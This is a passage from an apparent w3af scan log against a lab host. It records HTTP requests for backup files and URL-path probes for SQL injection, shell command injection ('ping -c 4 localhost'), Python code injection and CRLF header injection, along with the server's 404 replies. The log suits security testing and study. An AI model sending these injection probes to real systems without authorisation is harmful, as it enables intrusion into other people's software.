h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.jar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="449">
                <http-request>
                    <status>GET http://10.12.68.43:31337/choucroute.properties HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="554" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.properties&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="450">
                <http-request>
                    <status>GET http://10.12.68.43:31337/choucroute.java HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.java&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="451">
                <http-request>
                    <status>GET http://10.12.68.43:31337/choucroute.class HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="549" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.class&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="453">
                <http-request>
                    <status>GET http://10.12.68.43:31337/choucroute.rar HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.rar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="455">
                <http-request>
                    <status>GET http://10.12.68.43:31337/choucroute.bak1 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.bak1&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="456">
                <http-request>
                    <status>GET http://10.12.68.43:31337/choucroute.bkp HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.bkp&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="458">
                <http-request>
                    <status>GET http://10.12.68.43:31337/choucroute.backup1 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="551" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.backup1&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="460">
                <http-request>
                    <status>GET http://10.12.68.43:31337/78%22+OR+%2278%22%3D%2278 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 78%22+OR+%2278%22%3D%2278 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='78%22+OR+%2278%22%3D%2278'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="463">
                <http-request>
                    <status>GET http://10.12.68.43:31337/choucroute.backup HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="550" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.backup&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="464">
                <http-request>
                    <status>GET http://10.12.68.43:31337/choucroute.old HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.old&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="465">
                <http-request>
                    <status>GET http://10.12.68.43:31337/ping+-c+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about ping+-c+4+localhost has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='ping+-c+4+localhost'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="466">
                <http-request>
                    <status>GET http://10.12.68.43:31337/choucroute.back HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.back&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="467">
                <http-request>
                    <status>GET http://10.12.68.43:31337/choucroute.$$$ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.$$$&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="469">
                <http-request>
                    <status>GET http://10.12.68.43:31337/choucroute.old1 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.old1&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="477">
                <http-request>
                    <status>GET http://10.12.68.43:31337/78%22+AND+%2278%22%3D%2279 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 78%22+AND+%2278%22%3D%2279 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='78%22+AND+%2278%22%3D%2279'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="478">
                <http-request>
                    <status>GET http://10.12.68.43:31337/__import__%28%27time%27%29.sleep%283%29 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="572" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/__import__%28%27time%27%29.sleep%283%29&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="495">
                <http-request>
                    <status>GET http://10.12.68.43:31337/14%27+OR+%2714%27%3D%2714 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 14%27+OR+%2714%27%3D%2714 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='14%27+OR+%2714%27%3D%2714'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="509">
                <http-request>
                    <status>GET http://10.12.68.43:31337/14%27+AND+%2714%27%3D%2715 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 14%27+AND+%2714%27%3D%2715 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='14%27+AND+%2714%27%3D%2715'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="514">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%22 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %22 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%22'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="519">
                <http-request>
                    <status>GET http://10.12.68.43:31337/iDontExist HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about iDontExist has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='iDontExist'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="523">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%2Fusr%2Fsbin%2Fping+-s+localhost+4 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %2Fusr%2Fsbin%2Fping+-s+localhost+4 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%2Fusr%2Fsbin%2Fping+-s+localhost+4'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="524">
                <http-request>
                    <status>GET http://10.12.68.43:31337/w3af%0Dvulnerable073b%3A+ae5cw3af HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about w3af%0Dvulnerable073b%3A+ae5cw3af has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='w3af%0Dvulnerable073b%3A+ae5cw3af'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="526">
                <http-request>
                    <status>GET http://10.12.68.43:31337/w3af%0D%0Avulnerable073b%3A+ae5cw3af HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about w3af%0D%0Avulnerable073b%3A+ae5cw3af has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='w3af%0D%0Avulnerable073b%3A+ae5cw3af'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="528">
                <http-request>
